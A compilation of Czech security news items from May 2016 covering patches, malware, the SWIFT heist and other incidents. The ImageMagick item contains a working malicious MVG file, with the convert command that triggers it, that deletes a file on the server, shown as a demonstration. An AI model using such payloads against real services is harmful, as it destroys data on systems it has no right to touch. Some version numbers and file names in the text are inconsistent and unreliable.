Chyba je zaznamenaná jako CVE-2016.4117 a týká se verzí Flash Playeru 2.0.0.226 a starších pro Windows, OS X, Linux a Chrome OS. Úspěšné zneužití chyby umožňuje útočníkovi převzít vládu nad systémem.
„Adobe si je vědomo zpráv, že hack na CVE-2016-4117 existuje,“ píše společnost v článku zveřejněném v úterý. „Adobe tuto zranitelnost opraví v naší každoměsíční bezpečnostní aktualizaci, náplánované na 12. květen.“
V úterý také firma vydala balíček aktualizací pro Reader a Acrobat, které dohromady opraví 92 chyb. Většina z nich je hodnocená jako kritická.
Zranitelné verze zahrnují Acrobat DC a Reader DC 15.010.20060 a starší, 15.006.30121 a starší, a také Acrobat XI a Reader XI 11.0.15 a starší. Uživatelé si mohou produkt aktualizovat ručně kliknutím na „pomoc“ a následně „zkontrolovat dostupnost aktualizací“ v české verzi.
Firma také vydala aktualizace pro svůj ColdFusion aplikační server. Tyto aktualizace cílí na zranitelnost s ověřením validity vstupu, která mohla vést k mezistránkovým scripting útokům, na problém s ověřením host name, který způsoboval problém u wild card certifikátů, a na Java deserializační chybu v knihovně Apache Commons Collections.
Adobe radí uživatelům nainstalovat ColdFusion (verzi z roku 2016) Update 1, ColdFusion 11 Update 8 nebo ColdFusion 10 Update 19, podle toho, kterou vezi aplikace mají.
Instalace ColdFusion bývají cílem útočníků. V roce 2013 výzkumníci zjistili větší útok, kde hackeři zneužili zranitelností v ColdFusion a nainstalovali díky nim malware na IIS servery Microsoftu.
Fanoušky Androidu se pokusila podvést skupina zavirovaných Vikingů
12.5.2016 Mobilní
Před měsícem jsme si vyzkoušeli, jak principiálně funguje typický malware pro mobilní telefon, který jej skrze falešnou aplikaci a díky přemíře práv zapojí třeba do botnetu. Přesně tento typ aplikací trápí i Google a jeho katalog Play Store, protože se nejedná o viry v pravém slova smyslu, které by zneužívaly konkrétní zranitelnost v systému, a právě to by je odhalilo, ale jedná se vlastně o běžné aplikace, které jen po uživateli požadují maximum práv.
Google podobné programy dokáže automaticky filtrovat jen s obtížemi, a tak mu musejí pomáhat specialisté z bezpečnostních firem. Výzkumníci z Check Pointu například na začátku května odhalili sadu programů, kterou nazvali Viking Horde.
Podovodné programy ze sady Viking Horde
Na první pohled se jednalo o zcela běžné jednoduché hry a utility – třeba Viking Jump, nicméně aplikace dělaly i jiné kulišárny – prozradilo je třeba to, že chtěly na rootnutých telefonech provádět i nejrůznější operace s právy administrátora (základní bezpečnostní pravidlo říká, že by měl být na každém rootnutém telefonu správce, který vám oznámí, že chce aplikace provést nějakou root operaci a vyžaduje vaše svolení – podobně jako dialog UAC na Windows).
Ačkoliv byly Check Point aplikace odhalil docela brzy, během několika týdnů od publikace si je stáhly desítky tisíc uživatelů. Právě proto Google v Androidu 6 představil nový management práv a namísto odsouhlasení výčtu práv aplikace už při instalaci, se vás Android zeptá až v okamžiku, kdy je bude chtít aplikace použít, což může být pro zkušenější uživatelé otravné, ale pro ostatní spíše transparentnější, protože mohou lépe odhadnout, k čemu přesně daná aplikace práva potřebuje.
Kdo najde díru na Pornhubu, dostane až 25 tisíc dolarů
12.5.2016 Zabezpečení
Bezpečnost je na internetu velkou prioritou a na porno stránkách je neméně důležitá. Uživatelé jsou sice zvyklí vnímat erotické stránky jako zdroj podvodných inzerátů, které mohou nést malware, současně se ale provozovatelé placených serverů snaží ochránit své uživatele před únikem informací.
Pornhub, jeden z největších erotických serverů, proto nyní vypsal veřejnou soutěž, kde může kdokoli na serverech *.pornhub.com zkusit najít nějakou zranitelnost. Podmínkou je, že chybu musíte nahlásit do 24 hodin od objevení, nesmíte nic zničit, leda své vlastní účty a vše musíte pečlivě zdokumentovat.
Minimální odměna je 50 dolarů, maximální 25 000 dolarů podle závažnosti. Hodnocení, co je jak závažné je ale zcela na Pornhubu. platby jsou pak zprostředkované přes server HackerOne, který se právě na tento typ organizovaných akcí specializuje.
SWIFT odpovídá bankéřům: Za bezpečnost si zodpovídáte sami
12.5.2016 Zabezpečení
Bankovní systém s odstupem reaguje na zprávy o tom, že byla prolomeno jeho zabezpečení.
Systém, kterým komunikují banky po celém světě, se dosud pozornosti hackerů vyhýbal, ale to už teď neplatí. Podle bezpečnostních expertů byl poslední útok na účty bangladéšské centrální banku veden právě přes SWIFT.
Při útoku zmizelo 81 milionů dolarů a akce je označována za dosud největší kybernetickou zlodějnu. Sdružení SWIFT se ale brání nařčení, že jeho zabezpečení jeho systému bylo prolomeno. “SWIFT není a nemůže být odpovědný za vaše rozhodnutí ohledně výběru a implementace firewallů a vnitřní strukturu vašich sítí," zní v dopise, který rozeslalo vedení bankám.
Podle agentury Reuters bývalí zaměstnanci tvrdí, že taková upozornění banky dostávaly i v minulosti. Jen na ně příliš nereagovaly. SWIFT jako takový totiž negarantuje, že někdo nepovolaný nemůže získat přístup ke klientským klíčům. Tomu musí zabránit banky, které s přístupy operují.
Dnes SWIFT (Society for Worldwide Interbank Financial Telecommunication) používá kolem jedenácti tisíc bank a institucí po světě. Ne všechny ale využívají Alliance Access, který byl při útoku využitý.
S teorií, že za hackem stojí zmanipulovaný klient SWIFTu označovaný jako Alliance Access, přišlo britské BAE. Podle bezpečnostních expertů šlo o vysoce profesionální útok. Adrian Nish z BAE tvrdí, že takhle propracovaný model útoku ještě za svou kariéru nepotkal.
Opera nabízí VPN pro uživatele iPhonů zdarma -- i když ne tak úplně
12.5.2016 Zabezpečení
Služba sice skutečně zdarma bude, ale nejen, že je pravděpodobná přítomnost reklam, ale společnost bude prodávat anonymizované uživatelské informace. To ale může spoustu zájemců odradit.
Opera nabízí VPN pro uživatele iPhonů zdarma -- i když ne tak úplně
Opera Software včera uvlonila VPN aplikaci zdarma, určenou specificky pro iOS. Opera VPN, jak se služba nazývá, v základu spoléhá na stejnou společnost (kanadskou SurfEasy) jako desktopový Opera prohlížeč pro služby typu ukrývání lokace, zablokování online sledování či obcházení blacklistů spravovaných vládami, korporacemi a školami. SurfEasy norská Opera odkoupila v březnu tohoto roku.
U veřejných služeb, jako je např. Wi-Fi v kavárně, „VéPéEnka“ poskytuje zabezpečený „tunel“ k cíli, který uživatele ochraňuje před krádeží osobních informací a hesel.
Opera VPN je samostatnou službou, není dokonce ani integrována v iOS prohlížečích Opery, kterými jsou Opera Mini a Opera Coast.
Podobně jako u desktopové varianty Opery – konkrétně dubnového předběžného náhledu pro Windows, OS X a Linux, kde je již zahrnuta VPN – je i VPN na iOS zdarma jak ke stažení, tak k použití. Většina jiných VPN služeb od konkurentů požaduje měsíční nebo roční poplatky, které nebývají zrovna malé.
Ač je však Opera VPN na první pohled zdarma, firma se pro takové řešení nerozhodla z čistě šlechetných záměrů. Spoléhá se na dvě různé strategie výdělku.
Podle Chrise Houstona, ředitele SurfEasy, Opera bude do Opera VPN vkládat reklamy: Tuto možnost však prozatím objasnil jen jako „pravděpodobnou,“ spíše než jistou. „Ačkoliv tu prozatím reklamy nejsou, v budoucnu pravděpodobně budou do aplikace zavedeny,“ napsal v dlouhém sdělení na blogu firmy.
SurfEasy, nyní již divize Opera Software, bude také prodávat anonymizované „balíky“ dat, sesbíraných od uživatelů Opera VPN, popisuje Houston. „Tyto informace budou dostupné třetím stranám, které projeví zájem o lepší porozumění toho, jak funguje mobilní ekosystém a jak se rozvíjí.“
Data z placené VPN služby SurfEasy – ta si stále účtuje 6,49 dolarů měsíčně – a data těch, co používají desktopovou verzi VPN v prohlížeči Opera, k prodeji nejsou. Společnost si je totiž neukládá.
Houston také potvrdil spekulace: Opera přidala do desktopového prohlížeče VPN v pokusu zvýšit počty uživatelů. „Přidání VPN do desktopového prohlížeče Opera je pro Operu cesta, jak svůj prohlížeč odlišit a rozšířit tak svou uživatelskou základnu,“ uznává. V teorii platí, že čím víc uživatelů bude Opera mít, tím více peněz firma dostane od svých vyhledávacích partnerů, jimiž jsou např. Google či ruský Yandex. Tito partneři platí Opeře za to, že je má nastaveny jako základní vyhledávače ve svém prohlížeči.
Opera je pravidelně na spodní příčce v pěti nejpoužívanějších prohlížečích, a potřebuje svá čísla nutně zlepšit. Během dubna si Opera ukrojila 2% podíl ze všech uživatelů, alespoň podle americké analytické firmy Net Applications. Ač se takové číslo zdá zanedbatelné, jde o posun o osm desetin procenta oproti minulému roku, tedy o poměrně působivý 69% nárůst.
V porovnání s ostatními čtyřmi největšími hráči je však Opera benjamínkem. Google Chrome drží 41,7 % uživatelů, Internet Explorer a Edge dohromady 41,3 %, Mozilla Firefox 10,1 % a stabilní Safari do Applu je na 4,5% podílů uživatelů.
Opera VPN je ke stažení v App Storu.
Kaspersky Lab dokáže nově zabezpečit i průmyslové systémy
12.5.2016 Zabezpečení
Specializované bezpečnostní řešení pro ochranu kritické infrastruktury a zabezpečení průmyslových podniků představila včera v Praze firma Kaspersky Lab. KICS (Kaspersky Industrial CyberSecurity) podle tvůrců přináší jednotný přístup k IT bezpečnosti pro průmyslové podniky. Novinka přitom zabezpečuje ICS/SCADA servery, HMI panely a inženýrské pracovní stanice, PLC, aniž by nějak ovlivnilo plynulost a konzistenci provozu.
KICS je ve své podstatě kombinací běžných bezpečnostních technologií přizpůsobených pro potřeby průmyslových podniků. Obsahuje ochranu proti malwaru, whitelisting a funkci pro odhalování zranitelností.
To je ale rozšířené o technologie, které jsou speciálně navržené přímo pro průmyslová prostředí – jde o kontrolu integrity PLC programů (Integrity check for PLC programs), sémantický monitoring kontroly příkazů (Semantic monitoring of proces control commands) či telemetrická data (Telemetry data), která dokážou odhalit kybernetické útoky cílící na fyzické části infrastruktury.
Speciální režim Observability Mode se pak soustředí na odhalení kybernetických útoků, chyby provozního personálu a anomálie uvnitř průmyslové sítě. Centrální řídící panel pak umožňuje administrovat veškeré bezpečnostní prvky firmy Kaspersky Lab – tedy od antivirů až pro sofistikované systémy pro SCADA. Řešení lze prý implementovat i do už existující ICS sítě a technologického procesu dané organizace.
Dodavatel navíc ke KICS poskytuje celou řadu doprovodných služeb včetně kyberbezpečnostních školení (cybersecurity training) pro IT profesionály či vzdělávacích programů pro běžné zaměstnance nebo penetrační testování (Cyber Security and Penetration Testing).
Další služba -- Incident Response -- podle jejích dodavatelů pomáhá lokalizovat narušení sítě, zmírnit následky, zamezit útočníkům hlouběji proniknout do infrastruktury, předcházet dalším útokům a rozvíjet krizový plán do budoucnosti.
Už je to evergreen: V IE a Flash Playeru jsou kritické chyby. Mějte aktualizovaný systém
11.5.2016 Zdroj: Zive.cz Zranitelnosti
Microsoft včera vypustil do internetového éteru další várku pravidelných měsíčních záplat (patch tuesday), která tentokrát obsahovala i opravu kritické chyby CVE-2016-0189. Ačkoliv se ji snažil Microsoft udržet do vydání opravy v relativní tajnosti, kyberscéna o ní dobře věděla. Podle Symantecu potěšila třeba hackery v Jižní Koreji.
Bug v Internet Exploreru (ilustrační obrázek)
A o co vlastně šlo? O další kritickou chybu v Internet Exploreru – ano, už jej opravdu přestaňte používat. Konkrétně se jednalo o zranitelnost v jeho jádře pro běh Javascriptu (JScript 5.8) a VBS (VBScript 5.7-8), která se týkala verzí IE 9 a vyšších a všech programů, které používaly komponentu IE. Umožňovala spuštění zákeřného kódu.
Pokud jste se ale právě ušklíbli, že IE přeci vůbec nepoužíváte a vlastně ani Windows, raději nepoužívejte ani Flash Player, jednu kritickou chybu totiž včera oznámila i společnost Adobe. Zranitelnost CVE-2016-4117 v jeho Flash Playeru 21.0.0.226 a nižším se týká všech podporovaných platforem a útočník ji může zneužít k pádu aplikace, případně opět ke spuštění záškodnického kódu.
Podobné díry tu byly, jsou a budou, protože kód softwaru je stále komplikovanější a lidé prostě dělají chyby od chvíle, co slezli z afrických stromů, nicméně čím méně proprietárních technologií budeme na webu používat, tím nad ním budeme držet větší kontrolu. Nelze tedy než doufat v to, že stárnoucí Flash Player co nevidět konečně nahradí HTML a Javascript.
Nebezpečný spam terorizuje už i uživatele Skypu
10.5.2016 Spam
Škodlivé odkazy na nejrůznější viry a trojské koně jsou dnes již běžně šířeny přes e-maily a sociální sítě. Nově se je počítačoví piráti snaží uživatelům podstrčit také v komunikačním programu Skype. Před novou hrozbou varovala bezpečnostní společnost Malwarebytes Labs.
Komunikační program Skype
Útok má prakticky vždy stejný scénář. Kyberzločinci se nejprve nabourají do cizího počítače, kde získají přístup ke Skypu. Z něho poté rozesílají prakticky všem možným kontaktům nevyžádané zprávy s odkazem na podvodné stránky. Ten je zpravidla ještě doplněn informací, že se jedná o zábavné fotografie či nějaké pikantní video.
Z řádků výše je patrné, že tyto spamové zprávy mohou přijít od skutečných kontaktů, které lidé znají. Ani v takovém případě by se neměli nechat napálit, na odkaz nesmějí v žádném případě klikat.
Pokud to udělají, budou přesměrováni na podvodný web, kde na ně číhá škodlivý kód. Stačí kliknout na jakoukoliv část internetové stránky a na uživatele prakticky okamžitě vyskočí hláška o nutnosti instalace nějakého programu.
Šířit mohou prakticky jakýkoliv virus
To počítačoví piráti ospravedlňují zpravidla tak, že bez příslušného programu nepůjde video na podvodném webu přehrát. Instalací tohoto programu si samozřejmě uživatelé nevědomky pustí do svého systému nezvaného návštěvníka.
Přes odkazy ve Skypu mohou kyberzločinci šířit prakticky jakékoliv škodlivé kódy. Mohou tak snadno odposlouchávat komunikaci na cizím počítači nebo například vybílit jejich bankovní účet. Hrozbu se tedy rozhodně nevyplatí podceňovat.
Je však nutné zmínit, že podobné praktiky zkoušejí počítačoví piráti hlavně v Indii, Japonsku a na Filipínách. To samozřejmě ale neznamená, že by nevyžádané zprávy na Skypu nemohli v nadcházejících dnech obdržet i tuzemští uživatelé.
Populární linuxový ImageMagick je děravý jako ementál. Drobným hackem jsme smazali soubory
10.5.2016 Zdroj: Zive.cz Zranitelnosti
Hromada webových služeb běžících na linuxovém serveru používá k operacím s obrázky nástroje z balíku ImageMagick. Ty mohou třeba ořezávat a generovat fotografie, provádět jejich konverzi mezi formáty aj. Takovým typickým příkladem použití by mohla být třeba práce s úpravou profilové fotografie uživatele na nějakém webu.
ImageMagick je rychlý a mocný, nabízí totiž obrovské množství konverzních funkcí včetně generování animovaných gifů aj. Jenže kvůli této komplexnosti obsahuje také hromadu kritických chyb (CVE-2016-3714), na které nyní upozornil třeba docela adekvátně pojmenovaný web ImageTragick.
Díky těmto zranitelnostem lze poměrně snadno zneužít konverzní funkce ImageMagicku k nejrůznějším operacím v systému. Pokud například ImageMagick dostane za úkol převést grafiku ve formátu SVG, MVG aj. do něčeho jiného – třeba do rastru PNG, může vstupní soubor obsahovat příkazy, které povedou ke smazání nějakého souboru (pokud na to bude mít ImageMagick práva), ke spuštění příkazu, zavolání HTTP GET, stažení zákeřného kódu z webu aj.
Okamžitě po zveřejnění tedy hackeři vytvořili zákeřné obrázky, které zkoušejí nahrávat na nejrůznější weby, které pracují s grafikou a ví se, že používají ImageMagick. Některé velké hostingové/CDN systémy jako třeba CloudFlare a další už na tyto útoky pamatují ve svých firewallech.
Příklad útoku pomocí zákeřného obrázku
Jak může být takový útok snadný, ukážeme v příkladu níže.
Nejprve si vytvořím zákeřný soubor smazat.mvg v textovém formátu MVG (Magick Vector Graphics):
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/pokus.txt'
popgraphic-context
Soubor obsahuje textové instrukce k vytvoření plátna o velikost 640×480 pixelů, na které se má vykreslit na pozici 0;0 obrázek ze souboru /tmp/pokus.txt. Před adresou souboru je ale klíčové slovo ephemeral, které ImageMagicku říká, aby tento soubor poté smazal.
Problém spočívá v tom, že se vůbec nejedná o obrázek, ale že to může být vlastně jakýkoliv soubor, k jehož smazání bude mít proces ImageMagicku právo.
Pokud bych takový soubor poté nahrál na nějakou službu s ImageMagickem, který se na serveru pokusí o konverzi do nějakého jednotného formátu, třeba PNG, provedl by podobnou operaci takto:
convert smazat.mvg smazat.png
V rámci zpracovávání souboru smazat.mvg by pak ImageMagick smazal soubor /tmp/smazat.txt
ImageMagick je velmi snadno zneužitelný k nekalým operacím
Další příklady primitivních a o to nejbezpečnějších útoků najdete na webu ImageTragick, který zároveň nabízí rady, jak balík aktuálně co nejlépe zabezpečit.
Trojský kůň krade v mobilech informace o kreditních kartách. Útočí i v Česku
10.5.2016 Viry
Národní bezpečnostní tým CSIRT.CZ varoval v úterý před novým trojským koněm, který krade informace o platebních kartách. Zaměřuje se přitom výhradně na chytré telefony s operačním systémem Android. V ohrožení jsou i čeští uživatelé.
„Česká republika je na seznamu čtyř zemí, jejichž uživatelé OS Android byli v průběhu uplynulých měsíců nejvíce infikováni trojským koněm, který umožňuje získat administrátorská práva a veškeré informace o zařízení posílat na server,“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.
Podle něj mohou útočníci snadno získat i informace o platebních kartách. „Při zadání příkazu je tento malware schopen zobrazit falešné okno, které vypadá jako okno aplikace Google Play (oficiální internetový obchod s programy Googlu, pozn. red.) a požadovat informace o kreditní kartě,“ konstatoval Bašta.
Touto cestou mohou celkem snadno připravit počítačoví piráti důvěřivce o peníze.
Hrozba je o to závažnější, že na chytrých telefonech a tabletech nepoužívá většina lidí žádný bezpečnostní software. „Uživatelé tohoto operačního systému by na svých zařízeních určitě měli mít instalovaný anti-malware a dělat pravidelné zálohy,“ podotkl bezpečnostní analytik CSIRT.CZ.
Škodlivých kódů pro mobily přibývá
Nárůst mobilních hrozeb je v posledních měsících stále patrnější. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval,“ podotkl David Řeháček, bezpečnostní odborník ze společnosti Check Point.
Podle něj dělá bezpečnostním expertům v současnosti velké vrásky na čele především hrozba zvaná HummingBad.
HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak ale může číhat na podvodných webech. Na smartphonech s operačním systémem Android vytváří trvalý rootkit, může se tedy v zařízení maskovat, což velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit.
Největší hackerský útok se patrně nekonal. Šlo o podvod
9.5.2016 Podvod
Na konci minulého týdne obletěla svět zpráva, že ruský počítačový pirát se snaží prostřednictvím internetu rozprodat přinejmenším 272 miliónů přihlašovacích údajů k e-mailovým schránkám různých poskytovatelů. Dotčené společnosti však tvrdí, že o největší hackerský útok nejde ani náhodou – šlo prý jednoduše o podvod.
Únik bezmála tří stovek miliónů hesel se měl týkat především služeb Hotmail, Yahoo Mail, Gmail a Mail.ru.
Provozovatelé posledních tří jmenovaných služeb se již podle serveru Cnet nechali slyšet, že se uživatelé nemají čeho obávat. Většina zveřejněných dat podle nich totiž není platná, tedy že k uváděným e-mailům daná hesla vůbec nepatří.
Tak velký únik je nesmysl
Troy Hunt, bezpečnostní výzkumník společnosti Microsoft, celý hackerský útok označuje na svých webových stránkách věnovaných z velké části bezpečnosti na síti jednoduše za podvod.
Podle něj je velmi nepravděpodobné, že by takové množství hesel mohlo uniknout. A pokud by se tak skutečně stalo, šlo by o databázi v zašifrované podobně – ruský hacker přezdívaný Collector (Sběratel) je přitom nabízel nezašifrovaná.
Otazníky budil údajně největší hackerský útok prakticky hned po svém odhalení. Bezpečnostní výzkumníci upozorňovali na to, že takové množství údajů nemohl jeden člověk nasbírat sám. Tehdy se nabízela myšlenka, že Collector velkou část hesel pouze posbíral z jiných útoků svých kolegů.
Byl e-mail v minulosti napaden?
Uživatelé dotčených e-mailových služeb se tak podle všeho nemají čeho obávat. Zda nebyl jejich e-mailový účet v minulosti – tedy nejen při největším hackerském útoku – napaden, si mohou ověřit například na stránkách haveibeenpwned.com.
Na nich stačí vyplnit pouze svůj e-mail, který se následně porovnává s databází ukradených hesel. Pokud je v nich uživatelský e-mail objeven, je uživatel vyzván ke změně hesla. Databáze se neustále aktualizuje a obsahuje údaje i z jiných hackerských útoků.
Samozřejmě tato metoda ověření není stoprocentní. Pokud bezpečnostní experti nezvládli ještě odcizená hesla zpracovat, v databázi se e-mailová schránka neobjeví.
Na hackery si došlápnou i vojenští zpravodajci
9.5.2016 Bezpečnost
Konflikty na Ukrajině a v Sýrii ukazují, že útok hackerů může ohrozit obranu státu stejně jako cizí armáda. Vojáci kybernetickou válku už zařadili na roveň pozemním a leteckým operacím.
Podle informací Práva už začali zpravodajci budovat v Praze centrálu, z níž budou sledovat podezřelé pohyby na síti. Ilustrační snímek
Zbraně proti hackerům mají po policii nově získat i armádní špióni. Ti by podle novely zákona o Vojenském zpravodajství, které ministerstvo obrany už poslalo do připomínkového řízení, měli dostat možnost používat např. sledování a odposlouchání i na poli kybernetické obrany.
Návrh zákona nařizuje pod hrozbou finanční sankce operátorům a poskytovatelům internetu umožnit armádním špiónům napojit se na počítačovou síť a monitorovat ji. Za tuto službu a za poskytnutá data by měla obrana platit.
Podle informací Práva už začali zpravodajci budovat v Praze centrálu, z níž budou sledovat podezřelé pohyby na síti. V případě, že zjistí nepravosti, budou moci proti hackerům zasáhnout.
„Konkrétní nasazování a používání technických prostředků bude stanovovat vláda jako kolektivní orgán, čímž bude zajištěna nezbytná míra kontroly nad činností Vojenského zpravodajství v této oblasti,“ stojí v materiálu.
Útočníky odstřihnou
Jaké konkrétní prostředky budou moci zpravodajci nasadit, obrana z bezpečnostních důvodů nezmiňuje, aby neodkryla své slabiny. Je ale jasné, že v případě podezření budou zpravodajci moci sledovat nejen formální znaky datového toku, ale i jeho obsah.
V nedávném rozhovoru pro Právo šéf Vojenského zpravodajství Jan Beroun naznačil, co jeho podřízení budou dělat.
„Nejdříve budeme muset poznat, jací jsou protivníci a jaké mají chování. Nejjednodušší obrana samozřejmě je, že budeme mít schopnost vypnout elektronický tok, odkud útok bude přicházet. Ale musíme mít dopředu analyzované, jaké dopady takový krok bude mít, aby nepřinášel větší škody než samotný útok,“ prohlásil Beroun.
Dodal, že ochrana by se měla týkat především útoků, které „míří na srdce, na klíčové systémy státu“, a to nejen ministerstva, ale třeba i na jaderné elektrárny.
Také počítačový odborník Tomáš Přibyl předpokládá, že zpravodajci dostanou možnost útočníky odpojit. „Určitě budou mít možnost zjistit maximum informací o zdroji i o detailech komunikace, aby útok mohli odrazit, tedy odstřihnout od sítě,“ řekl Právu Přibyl, který v Řitce u Prahy provozuje výcvikové centrum proti kybernetickým útokům.
Neumím si představit, že by vláda byla tak rychlá, aby se v případě potřeby okamžitě sešla, aby věc schválila
Andor Šándor, bývalý šéf vojenských zpravodajců
Podle odborníků jde zákon dobrým směrem, ale může přinést řadu komplikací a pokušení. „Těžko něco proti takovému návrhu namítat,“ řekl Právu bývalý šéf vojenských zpravodajců Andor Šándor. Podle něj ale zní alibisticky ustanovení, kdy by o použití technických prostředků k zabránění kyberútoku měla rozhodovat vláda.
„Neumím si představit, že by vláda byla tak rychlá, aby se v případě potřeby okamžitě sešla, aby věc schválila,“ uvedl. Expert na kybernetickou bezpečnost Vladimír Lazecký má obavy, aby špióni nedostali větší pravomoci, než potřebují.
„Tento návrh mi nevadí, ale za velmi nebezpečné bych považoval to, o co se snaží v USA či v Británii, kdy nutí lidi, kteří si komunikaci šifrují, aby jim poskytli dešifrovací klíče, a když to neudělají, tak je kriminalizují,“ řekl Právu.
Dnes má podle zákona na starosti kybernetickou bezpečnost Národní bezpečnostní úřad (NBÚ). V Brně provozuje centrum, které pomáhá státním institucím i důležitým podnikům bojovat proti hackerům.
Podle mluvčího NBÚ Radka Holého nevnímají plány resortu obrany jako konkurenci. „Určitě to nebude kolidovat. Od počátku jsme s obranou ve spojení a pomáháme si,“ sdělil Právu.
Nejrozšířenější počítačová hrozba dělá expertům vrásky na čele. Znovu
8.5.2016 Viry
Bezpečnostním expertům dělá opět vrásky na čele zákeřný červ Conficker. Ten koluje internetem už od konce roku 2008, přesto se jeho aktualizované verzi podařilo v prvním čtvrtletí letošního roku opět dostat až na samotný vrchol žebříčku nejrozšířenějších počítačových hrozeb. Vyplývá to z analýzy bezpečnostní společnosti Check Point.
Conficker byl nejrozšířenější hrozbou prakticky po celý rok 2009, pak se po něm slehla na několik měsíců zem. V letošním roce jej ale počítačoví piráti začali opět hojně využívat, díky čemuž se z něj stala nejrozšířenější hrozba, a to v tuzemsku i zahraničí.
V současnosti je tento červ zodpovědný za každý pátý útok na síti. Je tedy dvakrát rozšířenější než druhá nejrozšířenější hrozba – virus Sality, který umožňuje útočníkům vzdálené ovládání napadeného stroje a instalaci dalších nezvaných návštěvníků. Sality byl v minulých měsících zodpovědný za každý desátý útok.
Conficker využívá zranitelnost operačního systému Windows. Pro tu už dávno existuje bezpečnostní záplata, ale jak je ze statistik zřejmé, s její instalací si velká část uživatelů hlavu neláme. Na konci dubna se dokonce ukázalo, že se tento nebezpečný červ uhnízdil v počítačích v bavorské jaderné elektrárně Gundremmingen.
Autoři Confickera vybudovali po celém světě velkou síť infikovaných PC, využitelných na libovolnou úlohu, poněvadž počítače mohou díky viru ovládat na dálku. Na jeho řízení použili autoři červa inovativní způsob. Každý den se vygenerují nové náhodné domény, kam se vir hlásí a žádá instrukce.
Dokáže zablokovat antiviry
Tím prakticky bezpečnostním expertům znemožňují, aby mohli Confickera zcela vyřadit z provozu. Většina antivirových programů by si nicméně i s tou nejnovější verzí měla poradit.
V některých případech ale prostřednictvím červa dovedou bezpečnostní programy v počítači odhalit. Pak mohou s jeho vystopováním pomoci nejrůznější on-line antivirové skenery.
Jak se proti několik let starému červovi bránit? Bezpečnostní experti důrazně doporučují nainstalovat do počítače všechny přístupné bezpečnostní aktualizace, které jsou dostupné přes systém automatických aktualizací nebo přes stránku Windows Update.
Vyhledávání odposlechů
6.5.2016 Bezpečnost
Miniaturizace elektronického zařízení má za cíl zvýšení pohodlí užívání. Dává to také široké možnosti k narušení soukromí pomocí odposlechů a minikamer malých rozměrů, které lze snadno ukrýt v místnostech nebo zakamuflovat v předmětech každodenní potřeby.
Mnoho situací vyžadujeochranu důvěrných informací, utajení údajů obchodních partnerů, diskrétnost vedených obchodních rozhovorů, na kterých závisí finanční bezpečí firmy. Nekalá konkurence je schopná zajít velmi daleko, aby ukradla důležité údaje. Instalují skryté kamery, odposlouchávají pomocí štěnic a jiných zařízení dostupných na trhu, které jsou pouhým okem neodhalitelné. Využívání služeb firem odhalujících odposlechy je velmi nákladné a nedá se vždy provést tak, aby nevzbudilo podezření spolupracovníků. Proto se vyplatí investovat do zařízení, které umožní ochránit firemní prostory před špionáží a v případě štěnic nebo mikrokamer umožní lokalizovat a zneškodnit je.
Detektory odposlechu se hodí také ve velmi soukromých situacích, kdy se veřejně známá osoba chce zabezpečit před odposlechem ze strany nepovolaných osob a únikem intimního obsahu do médií
Detektory odposlechu a skrytých kamer jsou vynikajícími zařízeními k zabezpečení svého soukromí a vždy, když máme podezření, že kdosi zasahuje do našich životů bez našeho vědomí.
Detektory odposlechu
Rádiovou štěnici je možné koupit na internetu již za několik stovek korun. Je možné je instalovat jak v kancelářích, tak v bytech nebo ve vozidlech. Kamuflování odposlechů v předmětech každodenní potřeby či v nich použité moderní technologie umožňují monitoring trvající i několik týdnů diskrétním způsobem nevzbuzujícím žádné podezření. Na trhu jsou dostupné také odposlechy GSM. Díky technologii globálního spojení je možné v kterékoliv chvíli zavolat z jakéhokoliv místa na světě na SIM kartu ukrytou např. v dálkovém napájení nebo v napájecí liště a diskrétním způsobem odposlouchávat okolí.
Vyhledávání odposlechů Spy Shop
Vyhledávání odposlechů je stejně oblíbené, jako samotné odposlouchávání. Zároveň s rozvojem odposlechových technik se rozvíjejí i způsoby jejich odhalování. V současnosti se na trhu nachází celá řada zařízení, které umožňují odhalovat odposlechy.
Nejčastějším řešením jsou skenery frekvence - moderní detektory spolupracující s měřiči jejich intenzity. Takováto kombinace umožňuje zachytit signál odposlechu a zaměřit jeho zdroj. V okolí, kde se nachází celá řada vysílačů signálů, je základem odhalení odposlouchávacího zařízení připojení se k přenosu a jeho odposlouchávání.
Pouze pokročilé skenery signálů a měřiče jejich síly s vysokou úrovní přesnosti se v houštině přenosů osvědčí.
Detektory skrytých kamer
Současné skryté kamery mají rozměry menší než zapalovač a jejich objektivy se šířkou počítanou v milimetrech umožňují nahrávat obraz v kvalitě i Full HD. Skryté kamery v předmětech každodenní potřeby slouží k diskrétnímu nahrávání a získání cenných informací. Miniaturní kamery s GSM modulem nebo IP kamery umožňují vzdálené monitorování místnosti pomocí mobilního telefonu nebo počítače. Takováto zařízení jsou prakticky neviditelné pouhým okem a stávají se potencionálním rizikem úniku cenných informací jak soukromých, tak firemních.
Spolu s rozvojem technik špionáže se rozvinuly také metody kontrašpionáže. Objevila se specializovaná zařízení k vyhledávání skrytých kamer. Současná technika je schopna odhalit jak drátové tak i bezdrátové kamery, zapnuté nebo ne. Dostupná v rozumných cenách a legální umožňuje dokonce i malým firmám chránit se před následky úniku informací.
Hacker Guccifer: Do e-mailu Clintonové jsem pronikl snadno
6.5.2016 Kriminalita
Vniknout do soukromého mailu demokratky Hillary Clintonové nebyl problém. V rozhovoru z virginského vězení to pro televizi FoxNews prohlásil bývalý rumunský hacker Marcel Lehel Lazar známý pod přezdívkou Guccifer.
„Pro mě to bylo snadné... a pro každého,“ řekl. Tento kousek se mu měl povést několikrát v roce 2013, kdy Clintonová řídila diplomacii, a jak se ukázalo, služební korespondenci vyřizovala ze své soukromé adresy.
Guccifer rovněž řekl, že uschoval dva gigabyty údajů, které jsou prý příliš žhavé a obsahují „záležitosti národní bezpečnosti“. Zda mohou pocházet i z političčiny pošty, není známo. Vyšetřování e-mailů Clintonové včetně možného úniku utajovaných informací běží od loňska, není uzavřené a v kampani se stalo vítanou municí pro republikána Donalda Trumpa.
Hacker pronikl do pošty několika celebrit i prezidentské rodiny Bushů. Letos v dubnu byl vydán do USA z Rumunska, kde si už odpykával sedmiletý trest za kyberútoky.
ESET: útočníci používají stále více druhů zranitelností
6.5.2016 Zdroj:Živě Bezpečnost
